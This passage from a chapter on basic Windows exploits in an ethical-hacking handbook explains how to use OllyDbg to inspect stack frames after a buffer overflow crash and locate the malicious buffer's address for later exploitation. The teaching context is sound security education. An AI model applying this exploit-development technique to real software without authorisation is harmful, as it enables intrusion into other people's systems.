You may pass the exception to the program
by pressing SHIFT-F9. In this case, since there are no exception handlers in place, the program
crashes.
After the program crashes, you may continue to inspect memory locations. For example,
you may click in the stack section and scroll up to see the previous stack frame (that
we just returned from, which is now grayed out). You can see (on our system) that the
beginning of our malicious buffer was at 0x0012FDD0.
Chapter 11: Basic Windows Exploits
257
PART III
Gray Hat Hacking: The Ethical Hacker??™s Handbook
258
To continue inspecting the state of the crashed machine, within the stack section,
scroll back down to the current stack frame (current stack frame will be highlighted).
You may also return to the current stack frame by clicking on the ESP register value to
select it, then right-clicking on that selected value and selecting Follow in Stack. You will
notice that a copy of the buffer is also located at the location esp+4. Information like
this becomes valuable later as we choose an attack vector.
Those of you who are visually stimulated will find OllyDbg very useful. Remember,
OllyDbg only works in user space. If you need to dive into kernel space, you will have to
use another debugger like WinDbg or SoftIce.
Pages:
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475